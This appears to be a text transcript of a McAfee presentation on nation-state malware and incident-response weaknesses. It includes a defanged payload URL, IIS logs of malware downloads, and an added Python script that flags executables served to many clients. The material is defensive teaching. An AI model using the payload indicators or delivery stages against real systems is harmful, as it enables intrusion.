Offensive malware usage and defense


Presentation for the Dutch Army around cyberwarfare and the usage of malware.


  1. Malware: Offensive usage and how to defend – Christiaan Beek, McAfee Professional Services
  2. Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
  3. > whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTs
  4. A Little Background: Foundstone Services – McAfee Strategic Security
  6. Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  7. Offensive usage of malware – Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self-destruct mechanism • many ways to transfer data to
  8. Offensive usage of malware • More and more discovery of malware frameworks • Multiple modules / components • Written by pros – sponsored by nations
  9. Offensive – What’s Different?
     Development: • Nation-States • Truly customized
     Delivery: • Zero day propagation • Multi-vectored: Bluetooth, USB, network
     Detection: • Digitally signed with compromised certificates • Outbound ex-filtration masking
     Command & Control: • Central command • Modular payloads
     Intent: • Surveillance • Disrupt / Destroy payloads
  10. Stages of an attack:
  11. Stages of an attack:
  12. Stages of an attack:
  13. Stages of an attack:
  14. Stages of an attack – first script (the slide shows the obfuscated JavaScript loader from the landing page; script omitted here)
  15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  16. Inner working?
  17. IIS logs on hacked ‘landing’ server:
     9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
     9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
     9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
     9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
     9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
     9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
     9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
     Dial 80 or 443
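The log excerpt above is what a defender on the compromised web server would see: many unrelated clients fetching the same executable within a short window. The following added example (not part of the original presentation) parses IIS log lines in the layout shown on the slide and flags executables served to several distinct clients; the sample lines are constructed to mirror the slide, with the masked octets replaced by documentation-range addresses so they parse.

```python
"""Flag executables served to many distinct clients in IIS W3C-style logs.

Assumed field layout (as on the slide):
date time c-ip s-sitename s-port cs-method cs-uri-stem
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample modelled on the slide's excerpt; addresses are
# documentation-range placeholders, not real indicators.
SAMPLE_LOG = """\
9/23/2012 4:06:16 203.0.113.10 W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 203.0.113.23 W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 198.51.100.80 W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 192.0.2.91 W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 198.51.100.27 W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 192.0.2.91 W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 203.0.113.125 W3SVC1 80 GET /x.exe
9/23/2012 5:30:01 203.0.113.125 W3SVC1 80 GET /index.html
"""

EXEC_SUFFIXES = (".exe", ".dll", ".scr")  # file types worth a second look


def parse_line(line):
    """Return (timestamp, client_ip, uri) for one log line, or None."""
    parts = line.split()
    if len(parts) < 7:
        return None
    ts = datetime.strptime(parts[0] + " " + parts[1], "%m/%d/%Y %H:%M:%S")
    return ts, parts[2], parts[6]


def executables_served(log_text, min_clients=3):
    """Map executable URIs to (sorted distinct client IPs, first seen),
    keeping only URIs fetched by at least `min_clients` different clients."""
    clients = defaultdict(set)
    first_seen = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, uri = parsed
        if uri.lower().endswith(EXEC_SUFFIXES):
            clients[uri].add(ip)
            first_seen.setdefault(uri, ts)
    return {uri: (sorted(ips), first_seen[uri])
            for uri, ips in clients.items() if len(ips) >= min_clients}


if __name__ == "__main__":
    for uri, (ips, ts) in executables_served(SAMPLE_LOG).items():
        print(f"{uri}: {len(ips)} distinct clients, first seen {ts:%H:%M:%S}")
```

A web server that does not normally distribute software should rarely see one binary pulled by many unrelated clients; correlating this with the server's file-modification times usually locates the dropped payload.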
  18. War story
  19. Future usage of malware
  20. Future scenarios
  21. Future scenarios or real...?
  22. Future scenarios
  23. Future scenarios
  24. Future scenarios
  25. Future scenarios
  26. Future scenarios
  27. Future scenarios
  28. What goes wrong regarding Defense? An Intel company
  29. Problem #1: Many solutions, but how to use them? Forensic readiness?
  30. Problem #2: No visibility on the network. No correlation of events.
  31. Problem #3: Lack of skilled, experienced and dedicated people
  32. Problem #4: No Incident Response procedures. No dry-run exercise.
  33. Problem #5: The attack came from…..
  34. Problem #6: Destroying evidence
  35. Problem #7: Who is the system owner? Who will take action? Who is allowed to take decisions?
  36. Defense Strategies
  37. The Big “Threat” Picture (diagram): All Threats ⊃ All Known Threats (what AntiVirus sees) ⊃ Core Threats (what AntiVirus protects)
  38. The “Core” Security Problem • “Unauthorized” Execution – Payload/attachment/link – Network – Privilege • “Authorized” Execution – Insiders’ misuse of privilege (diagram: End Users = Data; actors: Identity Thieves, Spammers, Bot Herders, Vulnerability Discoverers, Tool Developers, Malware Developers)
  39. Defense-in-depth
  40. Worthless without:
  41. Final thoughts...... – Incidents happen – Is forensic & malware readiness on your agenda? – What needs to be changed in your process? – Is your {army-unit/company/agency/etc} prepared? – Did you separate critical infrastructures? – Can we help you?
  42. Thank you! Keep in touch: Email: Christiaan_Beek@McAfee dot com – Twitter: @FSEMEA @Foundstone @ChristaanBeek